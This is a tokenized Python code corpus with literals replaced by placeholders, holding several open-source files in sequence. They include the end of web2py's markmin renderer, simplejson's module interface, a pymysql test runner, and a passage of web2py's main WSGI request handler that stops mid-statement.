<EOL> if c0 : <EOL> if c0 in "<STR_LIT>" : <EOL> ( t1 , t2 , p , ss ) = regex_list . findall ( s ) [ <NUM_LIT:0> ] <EOL> if t1 or t2 : <EOL> if c0 == '<STR_LIT:#>' : <EOL> ( lev , mtag ) = parse_title ( t1 , ss ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif c0 == '<STR_LIT:+>' : <EOL> ( lev , mtag , lineno ) = parse_list ( t2 , p , ss , '<STR_LIT>' , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> elif c0 == '<STR_LIT:->' : <EOL> if p or ss : <EOL> ( lev , mtag , lineno ) = parse_list ( t2 , p , ss , '<STR_LIT>' , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> else : <EOL> ( s , mtag , lineno ) = parse_table_or_blockquote ( s , mtag , lineno ) <EOL> elif lev > <NUM_LIT:0> : <EOL> ( lev , mtag , lineno ) = parse_point ( t2 , ss , lev , mtag , lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> continue <EOL> if lev == <NUM_LIT:0> and ( mtag == '<STR_LIT:q>' or s == META ) : <EOL> pc0 = '<STR_LIT>' <EOL> if pc0 == '<STR_LIT>' or ( mtag != '<STR_LIT:p>' and s0 not in ( '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) ) : <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> etags = [ ] <EOL> ltags = [ ] <EOL> tlev = [ ] <EOL> lev = <NUM_LIT:0> <EOL> if br and mtag == '<STR_LIT:p>' : out . append ( br ) <EOL> if mtag != '<STR_LIT:q>' and s != META : <EOL> if pend : etags = [ pend ] <EOL> out . append ( pbeg ) <EOL> mtag = '<STR_LIT:p>' <EOL> else : <EOL> mtag = '<STR_LIT>' <EOL> out . append ( s ) <EOL> else : <EOL> if lev > <NUM_LIT:0> and mtag == '<STR_LIT:.>' and s == META : <EOL> out . append ( etags . pop ( ) ) <EOL> ltags . pop ( ) <EOL> out . append ( s ) <EOL> mtag = '<STR_LIT>' <EOL> else : <EOL> out . append ( '<STR_LIT:U+0020>' + s ) <EOL> lineno += <NUM_LIT:1> <EOL> out . extend ( etags [ : : - <NUM_LIT:1> ] ) <EOL> text = '<STR_LIT>' . join ( out ) <EOL> text = regex_strong . sub ( '<STR_LIT>' , text ) <EOL> text = regex_del . sub ( '<STR_LIT>' , text ) <EOL> text = regex_em . sub ( '<STR_LIT>' , text ) <EOL> def sub_media ( m ) : <EOL> t , a , k , p , w = m . group ( '<STR_LIT:t>' , '<STR_LIT:a>' , '<STR_LIT:k>' , '<STR_LIT:p>' , '<STR_LIT:w>' ) <EOL> if not k : <EOL> return m . group ( <NUM_LIT:0> ) <EOL> k = escape ( k ) <EOL> t = t or '<STR_LIT>' <EOL> style = '<STR_LIT>' % w if w else '<STR_LIT>' <EOL> title = '<STR_LIT>' % escape ( a ) . replace ( META , DISABLED_META ) if a else '<STR_LIT>' <EOL> p_begin = p_end = '<STR_LIT>' <EOL> if p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p == '<STR_LIT>' : <EOL> p_begin = '<STR_LIT>' <EOL> p_end = '<STR_LIT>' + pp <EOL> elif p in ( '<STR_LIT:left>' , '<STR_LIT:right>' ) : <EOL> style = ( '<STR_LIT>' % p ) + ( '<STR_LIT>' % style if style else '<STR_LIT>' ) <EOL> if t and regex_auto . match ( t ) : <EOL> p_begin = p_begin + '<STR_LIT>' % t <EOL> p_end = '<STR_LIT>' + p_end <EOL> t = '<STR_LIT>' <EOL> if style : <EOL> style = '<STR_LIT>' % style <EOL> if p in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> t = render ( t , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) <EOL> return '<STR_LIT>' % dict ( p = p , title = title , style = style , k = k , t = t ) <EOL> alt = '<STR_LIT>' % escape ( t ) . replace ( META , DISABLED_META ) if t else '<STR_LIT>' <EOL> return '<STR_LIT>' % dict ( begin = p_begin , k = k , alt = alt , title = title , style = style , end = p_end ) <EOL> def sub_link ( m ) : <EOL> t , a , k , p = m . group ( '<STR_LIT:t>' , '<STR_LIT:a>' , '<STR_LIT:k>' , '<STR_LIT:p>' ) <EOL> if not k and not t : <EOL> return m . group ( <NUM_LIT:0> ) <EOL> t = t or '<STR_LIT>' <EOL> a = escape ( a ) if a else '<STR_LIT>' <EOL> if k : <EOL> if '<STR_LIT:#>' in k and not '<STR_LIT::>' in k . split ( '<STR_LIT:#>' ) [ <NUM_LIT:0> ] : <EOL> k = k . replace ( '<STR_LIT:#>' , '<STR_LIT:#>' + id_prefix ) <EOL> k = escape ( k ) <EOL> title = '<STR_LIT>' % a . replace ( META , DISABLED_META ) if a else '<STR_LIT>' <EOL> target = '<STR_LIT>' if p == '<STR_LIT>' else '<STR_LIT>' <EOL> t = render ( t , { } , { } , '<STR_LIT>' , URL , environment , latex , None , <EOL> None , class_prefix , id_prefix , pretty_print ) if t else k <EOL> return '<STR_LIT>' % dict ( k = k , title = title , target = target , t = t ) <EOL> if t == '<STR_LIT>' and not a : <EOL> return '<STR_LIT>' + pp <EOL> return '<STR_LIT>' % ( <EOL> escape ( id_prefix + t ) , <EOL> render ( a , { } , { } , '<STR_LIT>' , URL , <EOL> environment , latex , autolinks , <EOL> protolinks , class_prefix , <EOL> id_prefix , pretty_print ) ) <EOL> parts = text . split ( LINK ) <EOL> text = parts [ <NUM_LIT:0> ] <EOL> for i , s in enumerate ( links ) : <EOL> if s == None : <EOL> html = LINK <EOL> else : <EOL> html = regex_media_level2 . sub ( sub_media , s ) <EOL> if html == s : <EOL> html = regex_link_level2 . sub ( sub_link , html ) <EOL> if html == s : <EOL> html = '<STR_LIT>' % s <EOL> text += html + parts [ i + <NUM_LIT:1> ] <EOL> def expand_meta ( m ) : <EOL> code , b , p , s = segments . pop ( <NUM_LIT:0> ) <EOL> if code == None or m . group ( ) == DISABLED_META : <EOL> return escape ( s ) <EOL> if b in extra : <EOL> if code [ : <NUM_LIT:1> ] == '<STR_LIT:\n>' : code = code [ <NUM_LIT:1> : ] <EOL> if code [ - <NUM_LIT:1> : ] == '<STR_LIT:\n>' : code = code [ : - <NUM_LIT:1> ] <EOL> if p : <EOL> return str ( extra [ b ] ( code , p ) ) <EOL> else : <EOL> return str ( extra [ b ] ( code ) ) <EOL> elif b == '<STR_LIT>' : <EOL> return '<STR_LIT:[>' + '<STR_LIT:U+002C>' . join ( '<STR_LIT>' % ( id_prefix + d , b , d ) for d in escape ( code ) . split ( '<STR_LIT:U+002C>' ) ) + '<STR_LIT:]>' <EOL> elif b == '<STR_LIT>' : <EOL> return LATEX % urllib . quote ( code ) <EOL> elif b in html_colors : <EOL> return '<STR_LIT>' % ( b , render ( code , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) ) <EOL> elif b in ( '<STR_LIT:c>' , '<STR_LIT>' ) and p : <EOL> c = p . split ( '<STR_LIT::>' ) <EOL> fg = '<STR_LIT>' % c [ <NUM_LIT:0> ] if c [ <NUM_LIT:0> ] else '<STR_LIT>' <EOL> bg = '<STR_LIT>' % c [ <NUM_LIT:1> ] if len ( c ) > <NUM_LIT:1> and c [ <NUM_LIT:1> ] else '<STR_LIT>' <EOL> return '<STR_LIT>' % ( fg , bg , render ( code , { } , { } , '<STR_LIT>' , URL , environment , latex , <EOL> autolinks , protolinks , class_prefix , id_prefix , pretty_print ) ) <EOL> cls = '<STR_LIT>' % ( class_prefix , b ) if b and b != '<STR_LIT:id>' else '<STR_LIT>' <EOL> id = '<STR_LIT>' % ( id_prefix , escape ( p ) ) if p else '<STR_LIT>' <EOL> beg = ( code [ : <NUM_LIT:1> ] == '<STR_LIT:\n>' ) <EOL> end = [ None , - <NUM_LIT:1> ] [ code [ - <NUM_LIT:1> : ] == '<STR_LIT:\n>' ] <EOL> if beg and end : <EOL> return '<STR_LIT>' % ( cls , id , escape ( code [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) , pp ) <EOL> return '<STR_LIT>' % ( cls , id , escape ( code [ beg : end ] ) ) <EOL> text = regex_expand_meta . sub ( expand_meta , text ) <EOL> if environment : <EOL> text = replace_components ( text , environment ) <EOL> return text . translate ( ttab_out ) <EOL> def markmin2html ( text , extra = { } , allowed = { } , sep = '<STR_LIT:p>' , <EOL> autolinks = '<STR_LIT:default>' , protolinks = '<STR_LIT:default>' , <EOL> class_prefix = '<STR_LIT>' , id_prefix = '<STR_LIT>' , pretty_print = False ) : <EOL> return render ( text , extra , allowed , sep , <EOL> autolinks = autolinks , protolinks = protolinks , <EOL> class_prefix = class_prefix , id_prefix = id_prefix , <EOL> pretty_print = pretty_print ) <EOL> def run_doctests ( ) : <EOL> import doctest <EOL> doctest . testmod ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import sys <EOL> import doctest <EOL> from textwrap import dedent <EOL> html = dedent ( """<STR_LIT>""" ) [ <NUM_LIT:1> : ] <EOL> if sys . argv [ <NUM_LIT:1> : <NUM_LIT:2> ] == [ '<STR_LIT>' ] : <EOL> style = dedent ( """<STR_LIT>""" ) [ <NUM_LIT:1> : ] <EOL> print html % dict ( title = "<STR_LIT>" , <EOL> style = style , <EOL> body = markmin2html ( __doc__ , pretty_print = True ) ) <EOL> elif sys . argv [ <NUM_LIT:1> : <NUM_LIT:2> ] == [ '<STR_LIT>' ] : <EOL> from timeit import Timer <EOL> loops = <NUM_LIT:1000> <EOL> ts = Timer ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> print '<STR_LIT>' <EOL> t = min ( [ ts . timeit ( loops ) for i in range ( <NUM_LIT:3> ) ] ) <EOL> print "<STR_LIT>" % ( loops , t / <NUM_LIT:1000> * loops ) <EOL> elif len ( sys . argv ) > <NUM_LIT:1> : <EOL> fargv = open ( sys . argv [ <NUM_LIT:1> ] , '<STR_LIT:r>' ) <EOL> try : <EOL> markmin_text = fargv . read ( ) <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> if sys . argv [ <NUM_LIT:2> ] . startswith ( '<STR_LIT:@>' ) : <EOL> markmin_style = '<STR_LIT>' + sys . argv [ <NUM_LIT:2> ] [ <NUM_LIT:1> : ] + '<STR_LIT>' <EOL> else : <EOL> fargv2 = open ( sys . argv [ <NUM_LIT:2> ] , '<STR_LIT:r>' ) <EOL> try : <EOL> markmin_style = "<STR_LIT>" + fargv2 . read ( ) + "<STR_LIT>" <EOL> finally : <EOL> fargv2 . close ( ) <EOL> else : <EOL> markmin_style = "<STR_LIT>" <EOL> print html % dict ( title = sys . argv [ <NUM_LIT:1> ] , style = markmin_style , <EOL> body = markmin2html ( markmin_text , pretty_print = True ) ) <EOL> finally : <EOL> fargv . close ( ) <EOL> else : <EOL> print "<STR_LIT>" + sys . argv [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> run_doctests ( ) </s>
<s> nplurals = <NUM_LIT:2> <EOL> get_plural_id = lambda n : int ( n != <NUM_LIT:1> ) </s>
<s> from pymysql . tests . test_issues import * <EOL> from pymysql . tests . test_example import * <EOL> from pymysql . tests . test_basic import * <EOL> from pymysql . tests . test_DictCursor import * <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> from pymysql . tests . thirdparty import * <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import unittest <EOL> unittest . main ( ) </s>
<s> r"""<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __author__ = '<STR_LIT>' <EOL> from decimal import Decimal <EOL> from decoder import JSONDecoder , JSONDecodeError <EOL> from encoder import JSONEncoder <EOL> def _import_OrderedDict ( ) : <EOL> import collections <EOL> try : <EOL> return collections . OrderedDict <EOL> except AttributeError : <EOL> import ordered_dict <EOL> return ordered_dict . OrderedDict <EOL> OrderedDict = _import_OrderedDict ( ) <EOL> def _import_c_make_encoder ( ) : <EOL> try : <EOL> raise ImportError <EOL> from simplejson . _speedups import make_encoder <EOL> return make_encoder <EOL> except ImportError : <EOL> return None <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> use_decimal = False , <EOL> ) <EOL> def dump ( obj , fp , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not use_decimal <EOL> and not kw ) : <EOL> iterable = _default_encoder . iterencode ( obj ) <EOL> else : <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> iterable = cls ( skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , <EOL> default = default , use_decimal = use_decimal , ** kw ) . iterencode ( obj ) <EOL> for chunk in iterable : <EOL> fp . write ( chunk ) <EOL> def dumps ( obj , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not use_decimal <EOL> and not kw ) : <EOL> return _default_encoder . encode ( obj ) <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> return cls ( <EOL> skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , default = default , <EOL> use_decimal = use_decimal , ** kw ) . encode ( obj ) <EOL> _default_decoder = JSONDecoder ( encoding = None , object_hook = None , <EOL> object_pairs_hook = None ) <EOL> def load ( fp , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , <EOL> use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return loads ( fp . read ( ) , <EOL> encoding = encoding , cls = cls , object_hook = object_hook , <EOL> parse_float = parse_float , parse_int = parse_int , <EOL> parse_constant = parse_constant , object_pairs_hook = object_pairs_hook , <EOL> use_decimal = use_decimal , ** kw ) <EOL> def loads ( s , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , <EOL> use_decimal = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( cls is None and encoding is None and object_hook is None and <EOL> parse_int is None and parse_float is None and <EOL> parse_constant is None and object_pairs_hook is None <EOL> and not use_decimal and not kw ) : <EOL> return _default_decoder . decode ( s ) <EOL> if cls is None : <EOL> cls = JSONDecoder <EOL> if object_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_hook <EOL> if object_pairs_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_pairs_hook <EOL> if parse_float is not None : <EOL> kw [ '<STR_LIT>' ] = parse_float <EOL> if parse_int is not None : <EOL> kw [ '<STR_LIT>' ] = parse_int <EOL> if parse_constant is not None : <EOL> kw [ '<STR_LIT>' ] = parse_constant <EOL> if use_decimal : <EOL> if parse_float is not None : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> kw [ '<STR_LIT>' ] = Decimal <EOL> return cls ( encoding = encoding , ** kw ) . decode ( s ) <EOL> def _toggle_speedups ( enabled ) : <EOL> import decoder as dec <EOL> import encoder as enc <EOL> import scanner as scan <EOL> c_make_encoder = _import_c_make_encoder ( ) <EOL> if enabled : <EOL> dec . scanstring = dec . c_scanstring or dec . py_scanstring <EOL> enc . c_make_encoder = c_make_encoder <EOL> enc . encode_basestring_ascii = ( enc . c_encode_basestring_ascii or <EOL> enc . py_encode_basestring_ascii ) <EOL> scan . make_scanner = scan . c_make_scanner or scan . py_make_scanner <EOL> else : <EOL> dec . scanstring = dec . py_scanstring <EOL> enc . c_make_encoder = None <EOL> enc . encode_basestring_ascii = enc . py_encode_basestring_ascii <EOL> scan . make_scanner = scan . py_make_scanner <EOL> dec . make_scanner = scan . make_scanner <EOL> global _default_decoder <EOL> _default_decoder = JSONDecoder ( <EOL> encoding = None , <EOL> object_hook = None , <EOL> object_pairs_hook = None , <EOL> ) <EOL> global _default_encoder <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> if False : import import_all <EOL> import gc <EOL> import Cookie <EOL> import os <EOL> import re <EOL> import copy <EOL> import sys <EOL> import time <EOL> import datetime <EOL> import signal <EOL> import socket <EOL> import random <EOL> import urllib2 <EOL> import string <EOL> try : <EOL> import simplejson as sj <EOL> except : <EOL> try : <EOL> import json as sj <EOL> except : <EOL> import gluon . contrib . simplejson as sj <EOL> from thread import allocate_lock <EOL> from gluon . fileutils import abspath , write_file <EOL> from gluon . settings import global_settings <EOL> from gluon . utils import web2py_uuid <EOL> from gluon . admin import add_path_first , create_missing_folders , create_missing_app_folders <EOL> from gluon . globals import current <EOL> web2py_path = global_settings . applications_parent <EOL> create_missing_folders ( ) <EOL> import logging <EOL> import logging . config <EOL> import gluon . messageboxhandler <EOL> logging . gluon = gluon <EOL> import locale <EOL> locale . setlocale ( locale . LC_CTYPE , "<STR_LIT:C>" ) <EOL> exists = os . path . exists <EOL> pjoin = os . path . join <EOL> logpath = abspath ( "<STR_LIT>" ) <EOL> if exists ( logpath ) : <EOL> logging . config . fileConfig ( abspath ( "<STR_LIT>" ) ) <EOL> else : <EOL> logging . basicConfig ( ) <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> from gluon . restricted import RestrictedError <EOL> from gluon . http import HTTP , redirect <EOL> from gluon . globals import Request , Response , Session <EOL> from gluon . compileapp import build_environment , run_models_in , run_controller_in , run_view_in <EOL> from gluon . contenttype import contenttype <EOL> from gluon . dal import BaseAdapter <EOL> from gluon . validators import CRYPT <EOL> from gluon . html import URL , xmlescape <EOL> from gluon . utils import is_valid_ip_address , getipaddrinfo <EOL> from gluon . rewrite import load , url_in , THREAD_LOCAL as rwthread , try_rewrite_on_error , fixup_missing_path_info <EOL> from gluon import newcron <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> requests = <NUM_LIT:0> <EOL> regex_client = re . compile ( '<STR_LIT>' ) <EOL> try : <EOL> version_info = open ( pjoin ( global_settings . gluon_parent , '<STR_LIT>' ) , '<STR_LIT:r>' ) <EOL> raw_version_string = version_info . read ( ) . split ( ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> version_info . close ( ) <EOL> global_settings . web2py_version = raw_version_string <EOL> web2py_version = global_settings . web2py_version <EOL> except : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> try : <EOL> from gluon import rocket <EOL> except : <EOL> if not global_settings . web2py_runtime_gae : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> load ( ) <EOL> HTTPS_SCHEMES = set ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def get_client ( env ) : <EOL> """<STR_LIT>""" <EOL> eget = env . get <EOL> g = regex_client . search ( eget ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> client = ( g . group ( ) or '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) [ <NUM_LIT:0> ] if g else None <EOL> if client in ( None , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> g = regex_client . search ( eget ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if g : <EOL> client = g . group ( ) <EOL> elif env . http_host . startswith ( '<STR_LIT:[>' ) : <EOL> client = '<STR_LIT>' <EOL> else : <EOL> client = '<STR_LIT:127.0.0.1>' <EOL> if not is_valid_ip_address ( client ) : <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" % client ) <EOL> return client <EOL> def serve_controller ( request , response , session ) : <EOL> """<STR_LIT>""" <EOL> environment = build_environment ( request , response , session ) <EOL> response . view = '<STR_LIT>' % ( request . controller , <EOL> request . function , <EOL> request . extension ) <EOL> run_models_in ( environment ) <EOL> response . _view_environment = copy . copy ( environment ) <EOL> page = run_controller_in ( request . controller , request . function , environment ) <EOL> if isinstance ( page , dict ) : <EOL> response . _vars = page <EOL> response . _view_environment . update ( page ) <EOL> run_view_in ( response . _view_environment ) <EOL> page = response . body . getvalue ( ) <EOL> global requests <EOL> requests = ( '<STR_LIT>' in globals ( ) ) and ( requests + <NUM_LIT:1> ) % <NUM_LIT:100> or <NUM_LIT:0> <EOL> if not requests : <EOL> gc . collect ( ) <EOL> default_headers = [ <EOL> ( '<STR_LIT:Content-Type>' , contenttype ( '<STR_LIT:.>' + request . extension ) ) , <EOL> ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , time . strftime ( '<STR_LIT>' , <EOL> time . gmtime ( ) ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> for key , value in default_headers : <EOL> response . headers . setdefault ( key , value ) <EOL> raise HTTP ( response . status , page , ** response . headers ) <EOL> class LazyWSGI ( object ) : <EOL> def __init__ ( self , environ , request , response ) : <EOL> self . wsgi_environ = environ <EOL> self . request = request <EOL> self . response = response <EOL> @ property <EOL> def environ ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> new_environ = self . wsgi_environ <EOL> new_environ [ '<STR_LIT>' ] = self . request . body <EOL> new_environ [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . _environ = new_environ <EOL> return self . _environ <EOL> def start_response ( self , status = '<STR_LIT>' , headers = [ ] , exec_info = None ) : <EOL> """<STR_LIT>""" <EOL> self . response . status = str ( status ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . response . headers = dict ( headers ) <EOL> return lambda * args , ** kargs : self . response . write ( escape = False , * args , ** kargs ) <EOL> def middleware ( self , * middleware_apps ) : <EOL> """<STR_LIT>""" <EOL> def middleware ( f ) : <EOL> def app ( environ , start_response ) : <EOL> data = f ( ) <EOL> start_response ( self . response . status , <EOL> self . response . headers . items ( ) ) <EOL> if isinstance ( data , list ) : <EOL> return data <EOL> return [ data ] <EOL> for item in middleware_apps : <EOL> app = item ( app ) <EOL> def caller ( app ) : <EOL> return app ( self . environ , self . start_response ) <EOL> return lambda caller = caller , app = app : caller ( app ) <EOL> return middleware <EOL> def wsgibase ( environ , responder ) : <EOL> """<STR_LIT>""" <EOL> eget = environ . get <EOL> current . __dict__ . clear ( ) <EOL> request = Request ( environ ) <EOL> response = Response ( ) <EOL> session = Session ( ) <EOL> env = request . env <EOL> env . web2py_version = web2py_version <EOL> static_file = False <EOL> try : <EOL> try : <EOL> try : <EOL> fixup_missing_path_info ( environ ) <EOL> ( static_file , version , environ ) = url_in ( request , environ ) <EOL> response . status = env . web2py_status_code or response . status <EOL> if static_file : <EOL> if eget ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if version : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response . headers [ <EOL> '<STR_LIT>' ] = '<STR_LIT>' <EOL> response . stream ( static_file , request = request ) <EOL> app = request . application <EOL> if not global_settings . local_hosts : <EOL> local_hosts = set ( [ '<STR_LIT:127.0.0.1>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if not global_settings . web2py_runtime_gae : <EOL> try : <EOL> fqdn = socket . getfqdn ( ) <EOL> local_hosts . add ( socket . gethostname ( ) ) <EOL> local_hosts . add ( fqdn ) <EOL> local_hosts . update ( [ <EOL> addrinfo [ <NUM_LIT:4> ] [ <NUM_LIT:0> ] for addrinfo <EOL> in getipaddrinfo ( fqdn ) ] ) <EOL> if env . server_name : <EOL> local_hosts . add ( env . server_name ) <EOL> local_hosts . update ( [ <EOL> addrinfo [ <NUM_LIT:4> ] [ <NUM_LIT:0> ] for addrinfo <EOL> in getipaddrinfo ( env . server_name ) ] ) <EOL> except ( socket . gaierror , TypeError ) : <EOL> pass <EOL> global_settings . local_hosts = list ( local_hosts ) <EOL> else : <EOL> local_hosts = global_settings . local_hosts <EOL> client = get_client ( env ) <EOL> x_req_with = str ( env . http_x_requested_with ) . lower ( ) <EOL> request . update ( <EOL> client = client , <EOL> folder = abspath ( '<STR_LIT>' , app ) + os . sep , <EOL> ajax = x_req_with == '<STR_LIT>' , <EOL> cid = env . http_web2py_component_element , <EOL> is_local = env . remote_addr in local_hosts , <EOL> is_https = env . wsgi_url_scheme in HTTPS_SCHEMES or request . env . http_x_forwarded_proto in HTTPS_SCHEMES or env . https == '<STR_LIT>' <EOL> ) <EOL> request . compute_uuid ( ) <EOL> request . url = environ [ '<STR_LIT>' ] <EOL> disabled = pjoin ( request . folder , '<STR_LIT>' ) <EOL> if not exists ( request . folder ) : <EOL> if app == rwthread . routes . default_application and app != '<STR_LIT>' : <EOL> redirect ( URL ( '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:index>' ) ) <EOL> elif rwthread . routes . error_handler : <EOL> _handler = rwthread . routes . error_handler <EOL> redirect ( URL ( _handler [ '<STR_LIT>' ] , <EOL> _handler [ '<STR_LIT>' ] , <EOL> _handler [ '<STR_LIT>' ] , <EOL> args = app ) ) <EOL> else : <EOL> raise HTTP ( <NUM_LIT> , rwthread . routes . error_message <EOL> % '<STR_LIT>' , <EOL> web2py_error = '<STR_LIT>' ) <EOL> elif not request . is_local and exists ( disabled ) : <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" ) <EOL> create_missing_app_folders ( request ) <EOL> request . wsgi = LazyWSGI ( environ , request , response ) <EOL> if env . http_cookie : <EOL> try : <EOL> request . cookies . load ( env . http_cookie ) <EOL> except Cookie . CookieError , e : <EOL> pass <EOL> if not env . web2py_disable_session : <EOL> session . connect ( request , response ) <EOL> if global_settings . debugging and app != "<STR_LIT>" : <EOL> import gluon . debug <EOL> gluon . debug . dbg . do_debug ( mainpyfile = request . folder ) <EOL> serve_controller ( request , response , session ) <EOL> except HTTP , http_response : <EOL> if static_file : <EOL> return http_response . to ( responder , env = env ) <EOL> if request . body : <EOL> request . body . close ( ) <EOL> if hasattr ( current , '<STR_LIT>' ) : <EOL> session . _try_store_in_db ( request , response ) <EOL> if response . do_not_commit is True : <EOL> BaseAdapter . close_all_instances ( None ) <EOL> elif response . custom_commit : <EOL> BaseAdapter . close_all_instances ( response . custom_commit ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> session . _try_store_in_cookie_or_file ( request , response ) <EOL> if request . cid : <EOL> http_response . headers . setdefault ( <EOL> '<STR_LIT>' , '<STR_LIT:replace>' ) <EOL> if request . ajax : <EOL> if response . flash : <EOL> http_response . headers [ '<STR_LIT>' ] = urllib2 . quote ( xmlescape ( response . flash ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> if response . js : <EOL> http_response . headers [ '<STR_LIT>' ] = urllib2 . quote ( response . js . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> session . _fixup_before_save ( ) <EOL> http_response . cookies2headers ( response . cookies ) <EOL> ticket = None <EOL> except RestrictedError , e : <EOL> if request . body : <EOL> request . body . close ( ) <EOL> if not request . tickets_db : <EOL> ticket = e . log ( request ) or '<STR_LIT>' <EOL> if response . _custom_rollback : <EOL> response . _custom_rollback ( ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> if request . tickets_db : <EOL> ticket = e . log ( request ) or '<STR_LIT>' <EOL> http_response = HTTP ( <NUM_LIT> , rwthread . routes . error_message_ticket % <EOL> dict ( ticket = ticket ) , <EOL> web2py_error = '<STR_LIT>' % ticket ) <EOL> except : <EOL> if request . body : <EOL> request . body . close ( ) <EOL> try : <EOL> if response . _custom_rollback : <EOL> response . _custom_rollback ( ) <EOL> else : <EOL> BaseAdapter . close_all_instances ( '<STR_LIT>' ) <EOL> except : <EOL> pass <EOL> e = RestrictedError ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , locals ( ) ) <EOL> ticket = e . log ( request ) or '<STR_LIT>' <EOL> http_response = HTTP ( <NUM_LIT> , rwthread . routes . error_message_ticket <EOL> % dict ( ticket = ticket ) , <EOL> web2py_error = '<STR_LIT>' % ticket ) <EOL> finally : <EOL> if response and hasattr ( response , '<STR_LIT>' ) and response . session_file : <EOL> response . session_file . close ( ) <EOL> session . 